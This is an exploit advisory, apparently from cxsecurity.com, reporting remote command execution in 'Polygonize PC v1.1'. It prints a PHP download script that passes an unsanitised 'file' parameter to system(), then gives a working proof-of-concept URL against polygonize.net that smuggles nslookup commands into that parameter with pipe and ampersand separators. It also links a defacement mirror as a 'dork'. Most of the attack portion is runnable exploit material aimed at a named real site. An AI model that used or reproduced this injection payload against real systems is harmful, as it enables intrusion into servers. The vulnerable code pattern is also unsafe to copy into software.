Polygonize PC v1.1 RCE Vulnerability

2018.01.10
dz indoushka (DZ) dz
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

============================================================================================================================ | # Title : Polygonize PC v1.1 RCE Vulnerability | | # Author : indoushka | | # email : indoushka4ever@gmail.com | | # Tested on : windows 10 FranASSais V.(Pro) | | # Version : 1.1 | | # Vendor : http://polygonize.net/ | | # Dork : http://www.zone-h.org/mirror/id/30699471 | ============================================================================================================================ poc : <? /************************************* * Code to download JPGs, PDFs, etc * www.sometricks.com *************************************/ $file = $_GET['file']; $file2 = "/var/www/cartoonize.net/web/tmp/".$_GET['file']; system("/usr/bin/composite -gravity SouthEast watermark.png $file $file"); if(@is_array(getimagesize($file))){ $image = true; } else { $image = false; } //print_r(getimagesize($file2)); //exit(); if ($image==true) { header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file.";"); header("Content-Length: ".filesize($file)); readfile($file); } else echo "Wrong image type"; exit; ?> http://polygonize.net//download.php?file=nslookup%20213.32.6.8|nslookup%20213.32.6.8%26nslookup%20213.32.6.8 Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top